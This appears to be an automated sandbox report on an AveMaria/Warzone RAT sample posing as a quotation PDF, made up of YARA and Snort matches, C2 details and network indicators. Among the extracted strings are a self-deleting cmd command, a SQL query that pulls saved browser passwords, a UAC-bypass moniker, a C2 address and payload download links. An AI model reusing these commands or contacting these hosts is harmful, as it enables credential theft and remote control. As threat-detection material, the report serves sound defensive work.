0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x5e5c:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x186c0:$a2: SMTP Password 0x1728c:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x9704:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x5d4c:$a5: for /F "usebackq tokens=*" %%A in (" 0x17f4c:$a6: \Torch\User Data\Default\Login Data 0x9824:$a7: /n:%temp%\ellocnak.xml 0x9854:$a9: Hey I'm Admin 0x18498:$a10: \logins.json 0x185a0:$a10: \logins.json 0x2c90:$a11: Accounts\Account.rec0 0x18e84:$a11: Accounts\Account.rec0 0x5b14:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack	AveMaria_WarZone	unknown	unknown	0x5e5c:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x5af8:$str2: MsgBox.exe 0x5f38:$str4: \System32\cmd.exe 0x5b14:$str6: Ave_Maria 0x2eb8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x190ac:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x186c0:$str8: SMTP Password 0x176ec:$str11: \Google\Chrome\User Data\Default\Login Data 0x2e64:$str12: \sqlmap.dll 0x2e7c:$str12: \sqlmap.dll 0x19058:$str12: \sqlmap.dll 0x19070:$str12: \sqlmap.dll 0x9704:$str16: Elevation:Administrator!new 0x9824:$str17: /n:%temp%
3.3.order_of_quotationpdf.exe.715910.2.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0x2318:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x5120:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
3.3.order_of_quotationpdf.exe.715910.2.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0x2318:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x5120:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x2318:$c1: Elevation:Administrator!new: 0x5120:$c1: Elevation:Administrator!new:
3.3.order_of_quotationpdf.exe.715910.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth (Nextron Systems)	0x136d8:$a1: \Opera Software\Opera Stable\Login Data 0x139d8:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x131d0:$a3: \Google\Chrome\User Data\Default\Login Data
3.3.order_of_quotationpdf.exe.715910.2.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
3.3.order_of_quotationpdf.exe.715910.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.3.order_of_quotationpdf.exe.715910.2.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
3.3.order_of_quotationpdf.exe.715910.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x15a4d:$r1: Classes\Folder\shell\open\command 0x15ab1:$r1: Classes\Folder\shell\open\command 0x15b05:$r1: Classes\Folder\shell\open\command 0x15b7d:$r1: Classes\Folder\shell\open\command 0x15ad4:$k1: DelegateExecute
3.3.order_of_quotationpdf.exe.715910.2.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x1500c:$s1: RDPClip 0x15cec:$s2: Grabber 0x15cfc:$s2: Grabber 0x155f8:$s3: Ave_Maria Stealer OpenSource 0x155b0:$s4: \MidgetPorn\workspace\MsgBox.exe 0x2438:$s6: /n:%temp%\ellocnak.xml 0x5240:$s6: /n:%temp%\ellocnak.xml 0x2468:$s7: Hey I'm Admin 0x5270:$s7: Hey I'm Admin
3.3.order_of_quotationpdf.exe.715910.2.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x15d0c:$pwsh: powershell 0x12533:$s2: User-Agent: 0x1813b:$s2: User-Agent: 0x12874:$s4: LdrLoadDll 0x15500:$s4: LdrLoadDll 0x1847c:$s4: LdrLoadDll 0x120bc:$v6: start 0x17cc4:$v6: start
3.3.order_of_quotationpdf.exe.715910.2.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x15940:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x141a4:$a2: SMTP Password 0x12d70:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x2318:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x5120:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x15830:$a5: for /F "usebackq tokens=*" %%A in (" 0x13a30:$a6: \Torch\User Data\Default\Login Data 0x2438:$a7: /n:%temp%\ellocnak.xml 0x5240:$a7: /n:%temp%\ellocnak.xml 0x2468:$a9: Hey I'm Admin 0x5270:$a9: Hey I'm Admin 0x13f7c:$a10: \logins.json 0x14084:$a10: \logins.json 0x14968:$a11: Accounts\Account.rec0 0x155f8:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
3.3.order_of_quotationpdf.exe.715910.2.raw.unpack	AveMaria_WarZone	unknown	unknown	0x15940:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x155dc:$str2: MsgBox.exe 0x15a1c:$str4: \System32\cmd.exe 0x155f8:$str6: Ave_Maria 0x14b90:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x141a4:$str8: SMTP Password 0x131d0:$str11: \Google\Chrome\User Data\Default\Login Data 0x14b3c:$str12: \sqlmap.dll 0x14b54:$str12: \sqlmap.dll 0x2318:$str16: Elevation:Administrator!new 0x5120:$str16: Elevation:Administrator!new 0x2438:$str17: /n:%temp% 0x5240:$str17: /n:%temp%
0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xaf74:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xaf74:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xd80:$c1: Elevation:Administrator!new: 0xaf74:$c1: Elevation:Administrator!new:
0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth (Nextron Systems)	0x19464:$a1: \Opera Software\Opera Stable\Login Data 0x19764:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x18f5c:$a3: \Google\Chrome\User Data\Default\Login Data
0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x77d9:$r1: Classes\Folder\shell\open\command 0x783d:$r1: Classes\Folder\shell\open\command 0x7891:$r1: Classes\Folder\shell\open\command 0x7909:$r1: Classes\Folder\shell\open\command 0x7860:$k1: DelegateExecute
0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x6d98:$s1: RDPClip 0x7a78:$s2: Grabber 0x7a88:$s2: Grabber 0x7384:$s3: Ave_Maria Stealer OpenSource 0x733c:$s4: \MidgetPorn\workspace\MsgBox.exe 0xea0:$s6: /n:%temp%\ellocnak.xml 0xb094:$s6: /n:%temp%\ellocnak.xml 0xed0:$s7: Hey I'm Admin 0xb0c4:$s7: Hey I'm Admin
0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x7a98:$pwsh: powershell 0x182bf:$s2: User-Agent: 0x728c:$s4: LdrLoadDll 0x18600:$s4: LdrLoadDll 0x17e48:$v6: start
0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x76cc:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x19f30:$a2: SMTP Password 0x18afc:$a3: select signon_realm, origin_url, username_value, password_value from logins 0xd80:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xaf74:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x75bc:$a5: for /F "usebackq tokens=*" %%A in (" 0x197bc:$a6: \Torch\User Data\Default\Login Data 0xea0:$a7: /n:%temp%\ellocnak.xml 0xb094:$a7: /n:%temp%\ellocnak.xml 0xed0:$a9: Hey I'm Admin 0xb0c4:$a9: Hey I'm Admin 0x19d08:$a10: \logins.json 0x19e10:$a10: \logins.json 0x4500:$a11: Accounts\Account.rec0 0x1a6f4:$a11: Accounts\Account.rec0 0x7384:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack	AveMaria_WarZone	unknown	unknown	0x76cc:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x7368:$str2: MsgBox.exe 0x77a8:$str4: \System32\cmd.exe 0x7384:$str6: Ave_Maria 0x4728:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x1a91c:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x19f30:$str8: SMTP Password 0x18f5c:$str11: \Google\Chrome\User Data\Default\Login Data 0x46d4:$str12: \sqlmap.dll 0x46ec:$str12: \sqlmap.dll 0x1a8c8:$str12: \sqlmap.dll 0x1a8e0:$str12: \sqlmap.dll 0xd80:$str16: Elevation:Administrator!new 0xaf74:$str16: Elevation:Administrator!new 0xea0:$str17: /n:%temp% 0xb094:$str17: /n:%temp%
Click to see the 143 entries

Snort Signatures

ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse - Source IP: 192.168.2.4 - Destination IP: 193.47.61.26

Timestamp:	192.168.2.4193.47.61.264970052002852357 04/04/23-12:52:48.811272
SID:	2852357
Source Port:	49700
Destination Port:	5200
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket - Source IP: 193.47.61.26 - Destination IP: 192.168.2.4

Timestamp:	193.47.61.26192.168.2.45200497002852356 04/04/23-12:54:08.692284
SID:	2852356
Source Port:	5200
Destination Port:	49700
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) - Source IP: 193.47.61.26 - Destination IP: 192.168.2.4

Timestamp:	193.47.61.26192.168.2.45200497002851895 04/04/23-12:52:48.684674
SID:	2851895
Source Port:	5200
Destination Port:	49700
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Warzone RAT Response (Inbound) - Source IP: 193.47.61.26 - Destination IP: 192.168.2.4

Timestamp:	193.47.61.26192.168.2.45200497002038897 04/04/23-12:52:48.684674
SID:	2038897
Source Port:	5200
Destination Port:	49700
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Ave Maria/Warzone RAT PingCommand - Source IP: 193.47.61.26 - Destination IP: 192.168.2.4

Timestamp:	193.47.61.26192.168.2.45200497002851945 04/04/23-12:53:48.677120
SID:	2851945
Source Port:	5200
Destination Port:	49700
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Ave Maria/Warzone RAT PingResponse - Source IP: 192.168.2.4 - Destination IP: 193.47.61.26

Timestamp:	192.168.2.4193.47.61.264970052002851946 04/04/23-12:53:48.677765
SID:	2851946
Source Port:	49700
Destination Port:	5200
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Yara detected AveMaria stealer

Source: Yara match	File source: 3.2.order_of_quotationpdf.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.46f94f0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.order_of_quotationpdf.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.728de8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.4749510.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.718718.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.727100.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.715910.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.403463816.0000000000715000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.402471739.0000000004749000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.402471739.00000000046B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: order_of_quotationpdf.exe PID: 6752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: order_of_quotationpdf.exe PID: 2956, type: MEMORYSTR

Source: 3.2.order_of_quotationpdf.exe.400000.2.unpack

Avira: Label: TR/Redcap.ghjpt

Source: 00000000.00000002.402471739.0000000004749000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: AveMaria {"C2 url": "193.47.61.26", "port": 5200}

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 3_2_0041A064 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,	3_2_0041A064
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 3_2_0041A0E3 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,	3_2_0041A0E3
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 3_2_0041A4DD LocalAlloc,BCryptDecrypt,LocalFree,LocalFree,	3_2_0041A4DD
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 3_2_00416647 lstrlenA,CryptStringToBinaryA,lstrcpyA,	3_2_00416647
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 3_2_004156D1 GlobalAlloc,CryptUnprotectData,lstrcpyW,lstrcpyW,	3_2_004156D1
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 3_2_00419E88 CryptUnprotectData,LocalAlloc,LocalFree,	3_2_00419E88

Exploits

Yara detected UACMe UAC Bypass tool

Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.718718.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.order_of_quotationpdf.exe.562070.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.4724960.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.37194b8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.4774980.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.order_of_quotationpdf.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.46f94f0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.715910.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.37d6318.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.4749510.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.718718.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.715910.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.403463816.0000000000715000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.402471739.0000000004749000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.402471739.00000000046B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: order_of_quotationpdf.exe PID: 6752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: order_of_quotationpdf.exe PID: 2956, type: MEMORYSTR

Source: order_of_quotationpdf.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Directory created: C:\Program Files\Microsoft DN1

Jump to behavior

Source: order_of_quotationpdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Code function: 3_2_0041EF90 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,

3_2_0041EF90

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 3_2_0041EE7B FindFirstFileW,FindNextFileW,		3_2_0041EE7B
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 3_2_004147CA GetFullPathNameA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,		3_2_004147CA

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2038897 ET TROJAN Warzone RAT Response (Inbound) 193.47.61.26:5200 -> 192.168.2.4:49700
Source: Traffic	Snort IDS: 2852356 ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket 193.47.61.26:5200 -> 192.168.2.4:49700
Source: Traffic	Snort IDS: 2851895 ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) 193.47.61.26:5200 -> 192.168.2.4:49700
Source: Traffic	Snort IDS: 2852357 ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse 192.168.2.4:49700 -> 193.47.61.26:5200
Source: Traffic	Snort IDS: 2851945 ETPRO TROJAN Ave Maria/Warzone RAT PingCommand 193.47.61.26:5200 -> 192.168.2.4:49700
Source: Traffic	Snort IDS: 2851946 ETPRO TROJAN Ave Maria/Warzone RAT PingResponse 192.168.2.4:49700 -> 193.47.61.26:5200

Contains functionality to check if Internet connection is working

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Code function: 3_2_0040D54A getaddrinfo,socket,htons,freeaddrinfo,WSAConnect,send,recv,closesocket, microsoft.com

3_2_0040D54A

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.70a0000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.404408183.00000000070A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 193.47.61.26

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Code function: 3_2_004059EE URLDownloadToFileW,ShellExecuteW,

3_2_004059EE

Source: Joe Sandbox View

ASN Name: TH-AS-APTianhaiInfoTechCN TH-AS-APTianhaiInfoTechCN

Source: global traffic

TCP traffic: 192.168.2.4:49700 -> 193.47.61.26:5200

Source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: order_of_quotationpdf.exe, 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: order_of_quotationpdf.exe	String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
Source: order_of_quotationpdf.exe, 00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp, order_of_quotationpdf.exe, 00000000.00000002.402471739.0000000004749000.00000004.00000800.00020000.00000000.sdmp, order_of_quotationpdf.exe, 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, order_of_quotationpdf.exe, 00000000.00000002.402471739.00000000046B1000.00000004.00000800.00020000.00000000.sdmp, order_of_quotationpdf.exe, 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper-instInitWindows
Source: order_of_quotationpdf.exe, 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hv4wug.ch.files.1drv.com/y4mbABMM8eBFlIJQ9RL9WIUqCc9LaoCtOIlyUPUTZjkk_TLd0ia6dyBAjlAESc4qF_U
Source: order_of_quotationpdf.exe, 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hv4wug.ch.files.1drv.com4
Source: order_of_quotationpdf.exe, 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/download?cid=BD9480D014FE52E5&resid=BD9480D014FE52E5
Source: order_of_quotationpdf.exe, Fjugfe.exe.0.dr	String found in binary or memory: https://onedrive.live.com/download?cid=BD9480D014FE52E5&resid=BD9480D014FE52E5%21452&authkey=AD76Y_n
Source: order_of_quotationpdf.exe, 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com4
Source: order_of_quotationpdf.exe, 00000000.00000002.404408183.00000000070A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://urn.to/r/sds_see
Source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/json
Source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown

DNS traffic detected: queries for: onedrive.live.com

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Code function: 3_2_0040AA23 setsockopt,recv,recv,

3_2_0040AA23

Source: unknown	TCP traffic detected without corresponding DNS query: 193.47.61.26
Source: unknown	TCP traffic detected without corresponding DNS query: 193.47.61.26
Source: unknown	TCP traffic detected without corresponding DNS query: 193.47.61.26
Source: unknown	TCP traffic detected without corresponding DNS query: 193.47.61.26
Source: unknown	TCP traffic detected without corresponding DNS query: 193.47.61.26
Source: unknown	TCP traffic detected without corresponding DNS query: 193.47.61.26
Source: unknown	TCP traffic detected without corresponding DNS query: 193.47.61.26
Source: unknown	TCP traffic detected without corresponding DNS query: 193.47.61.26

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

